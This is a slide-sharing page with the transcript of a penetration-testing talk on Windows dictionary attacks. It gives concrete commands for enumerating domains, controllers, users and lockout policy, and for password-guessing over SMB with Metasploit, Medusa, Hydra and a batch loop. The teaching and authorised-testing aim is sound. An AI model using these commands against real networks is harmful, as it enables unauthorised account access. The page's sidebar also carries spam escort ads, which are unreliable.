Gates Toorcon X New School Information Gathering
 
Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016Sumo Logic QuickStart Webinar - Jan 2016
Sumo Logic QuickStart Webinar - Jan 2016
 
BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
 
Blue Teaming On A Budget
Blue Teaming On A BudgetBlue Teaming On A Budget
Blue Teaming On A Budget
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
Romulus OWASP
Romulus OWASPRomulus OWASP
Romulus OWASP
 
PHP Performance: Principles and tools
PHP Performance: Principles and toolsPHP Performance: Principles and tools
PHP Performance: Principles and tools
 
Tools kali
Tools kaliTools kali
Tools kali
 
OSINT for Attack and Defense
OSINT for Attack and DefenseOSINT for Attack and Defense
OSINT for Attack and Defense
 

Último

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 

Último (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 

Introduction to Windows Dictionary Attacks

  • 1. Introduction to Windows Dictionary Attacks Author: Scott Sutherland
  • 2. Who am I? Scott Sutherland • Security Consultant @ NetSPI • Over 10 years of consulting experience • Security researcher: Blogs, white papers, tools etc
  • 3. Presentation Goals • Identify the value of dictionary attacks • Provide new penetration testers with a safe approach to Windows dictionary attacks • Provide security professionals with questions they should be asking their contractors
  • 4. Before we begin… Dictionary Attack Brute Force Attack
  • 5. Why dictionary attacks? What are the goals? • Identify accounts configured with weak or default passwords – “It’s human nature” • Use accounts as entry points during penetration tests What’s the impact? • Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data • User impersonation
  • 6. Are There Alternatives? Yes. Approaches typically includes: • Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper • Dumping clear text passwords from interactive sessions with Mimikatz
  • 7. With Alternatives be Covered? No.
  • 8. Dictionary Attacks: Process Overview Windows Dictionary Attack Process 1. Identify domains 2. Enumerate domain controllers 3. Enumerate domain users 4. Enumerate domain lockout policy 5. Create a dictionary 6. Perform Attack
  • 9. Identify Domains: Methods Unauthenticated Methods • DHCP Information • NetBIOS Queries • DNS Queries • Sniffing Network Traffic • Review RDP drop down lists Authenticated Methods • Review the output of the SET command for “USERDNSDOMAIN” • Review the registry for the default domain
  • 10. Identify Domains: Tools Method Tools Auth DHCP Info IPCONFIG No NetBIOS Queries NETSTAT –A <IP> No DNS Queries nmap -sL <IP Range> -oA output_rnds ./reverseraider -r <IP Range> ./dnswalk victem.com perl fierce.pl -dns <domainname> -threads 5 -file <domainame>-dns.output No Sniffing Wireshark (GUI) + Filter for browser traffic Network Miner (GUI) Etherape (GUI) No RDP Drop Down nmap –sS –PN –p3389 <IP Range> Then visit with RDP client No
  • 11. Enumerate DCs: Methods Unauthenticated Methods • DNS Queries • RPC Queries • Port Scanning • NetBIOS Scanning Authenticated Methods • NET GROUP commands • LDAP Queries
  • 12. Enumerate DCs: Tools Methods Tools Auth DNS Queries NSLOOKUP –type=SRV _ldap._tcp.<domain> No RPC Queries NLTEST /DCLIST <domain> FindPDC <domain> <request count> No Port Scanning NMAP –sS –p389,636 –PN <IP Range> No NetBIOS Scanning FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT –A %i No NET GROUP Command Net group “Domain Controllers” /domain Yes LDAP Queries LDAP Administrator (GUI Tool) Hyena (GUI Tool) adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” | gawk -F ” ” “{print $2}” | sort | uniq Yes & No
  • 13. Enumerate Domain Users: Methods Unauthenticated Methods • RPC Queries • SID Brute Forcing • SNMP Queries • LDAP Queries • Sharepoint Fuzzing Authenticated Methods • NET USER command • WMI commands
  • 14. Enumerate Domain Users: Tools 1 Methods Tools Auth RPC Endpoints dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt enum –N <ip> enum –U <ip> Yes & no SID Brute Forcing ruby c:metasploitmsf3msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt Getacct (GUI) Yes & no SNMP Queries ruby c:metasploitmsf3msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E Mibbrowser (GUI) SNMP Walk Yes & no
  • 15. Enumerate Domain Users: Tools 2 Methods Tools Auth LDAP Queries adfind -b DC=<victim>,DC=<com> -f “objectcategory=user” -gc | grep -i “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk -F ” ” “{print $1}”| sort > domain_users.txt Yes & no Sharepoint Fuzzing Fuzz parameters with BURP to enumerate domain users. Example URL below: https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] Yes & no NET USERS Command Net users /domain > domain_users.txt Yes WMI Commands wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt Yes
  • 16. Get Domain Lockout Policy: Methods Unauthenticated Methods • RPC Endpoints Authenticated Methods • NET ACCOUNTS Command What does it all mean? • Threshold, duration, and window Lockout threshold: 5 Lockout duration: 15 Lockout observation window : 15
  • 17. Get Domain Lockout Policy: Tools Methods Tools Auth RPC Queries Enum –P <IP Address> dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt Yes & No NET ACCOUNTS COMMAND NET ACCOUNTS YEs
  • 18. Create a Dictionary: Methods Classics Still Work • Blank • Username as password • password Common Formulas = Most Effective • <Password><Number> • <Companyname><Number> • <Season><Year> • <Sports team>Number> Popular Dictionaries • Metasploit dictionaries • Rock you • FuzzDB • John the ripper
  • 19. Create a Dictionary: Tools Dictionary URLs / Lists Classics Blank password Username as password password as password Formulas <Password><Number> <Companyname><Number> <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! Rockyou http://www.skullsecurity.org/wiki/index.php/Passwords FuzzDB http://code.google.com/p/fuzzdb/ https://github.com/rustyrobot/fuzzdb John the Ripper http://www.openwall.com/wordlists/
  • 20. Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy • General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user • Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3 • Wait 5 to 10 minutes beyond the observation window
  • 21. Perform Dictionary Attack: Tools Tools Commands OS Medusa medusa -H hosts.txt -U users.txt -P passwords.txt - T 20 -t 10 -L -F -M smbnt Linux Bruter Easy to use GUI and not CLI that I know of. Windows Metasploit smb_login ruby c:metasploitmsf3msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E Windows and Linux Hydra hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb Windows and Linux Batch Script FOR /F “tokens=*” %a in (‘type passwords.txt’) do net user <ip>IPC$ /user:<user> %a Windows
  • 22. Conclusions • There is more than one way to do everything! • Enumerate all available options • It’s easy to lockout accounts – respect the password policy  • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests